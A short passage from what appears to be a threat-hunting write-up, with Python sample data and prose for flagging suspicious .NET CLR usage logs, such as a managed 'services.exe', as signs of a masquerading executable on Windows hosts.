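# Constructed sample: the two logs recorded in the report plus two benign ones.
SAMPLE_PATHS = [
    r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PortDll.exe.log",
    r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log",
    r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell_ise.exe.log",
    r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\devenv.exe.log",
]

if __name__ == "__main__":
    for hit in flag_masquerading_logs(SAMPLE_PATHS):
        print(hit["executable"], "<-", hit["log"])
```

PortDll.exe is not flagged by name alone; the log only proves that a managed PortDll.exe ran, and its C:\Agentcomponentdriver\ location has to come from the file list above. On a live host call scan_profile(os.environ["LOCALAPPDATA"]) for each user profile rather than the sample list.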
